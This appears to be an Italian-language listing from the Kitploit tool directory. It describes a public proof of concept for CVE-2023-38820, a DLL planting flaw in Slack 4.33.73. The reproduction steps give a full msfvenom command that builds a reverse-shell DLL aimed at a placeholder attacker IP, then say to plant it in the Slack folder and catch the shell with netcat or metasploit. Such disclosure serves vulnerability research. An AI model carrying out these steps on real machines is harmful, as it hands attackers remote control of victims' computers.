Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DLL-Planting-Slack-4.33.73-CVE-2023-38820 — DLL Planting in Slack 4.33.73 - CVE-2023-38820 | Kitploit
Strumenti/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitSviluppo PayloadBinary Exploitation
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DLL-Planting-Slack-4.33.73-CVE-2023-38820

DLL Planting in Slack 4.33.73 - CVE-2023-38820

Vedi Repository
3 anni faNon ancora revisionato

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Iniezione DLL in Slack 4.33.73 - CVE-2023-38820 Scopritore: Idan Malihi

Descrizione

Un problema in Slack v.4.33.73 consente a un attaccante locale di eseguire codice arbitrario tramite il meccanismo di caricamento delle DLL nei file profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll e RTWorkQ.DLL.

Passaggi per riprodurre

Per sfruttare la vulnerabilità, un attaccante deve scaricare e installare il programma Slack e seguire i passaggi:

  1. Creare un file dll dannoso con msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. Trasferire il file dll dannoso sul computer della vittima
  3. Aprire il percorso di Slack: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. Trasferire la dll dannosa nel percorso di Slack e chiamarla "KBDUS.DLL" per l'esempio.
  5. Aprire un listener netcat o metasploit
  6. Aprire Slack.exe
  7. Ottenere una reverse shell.
Scarica lo strumento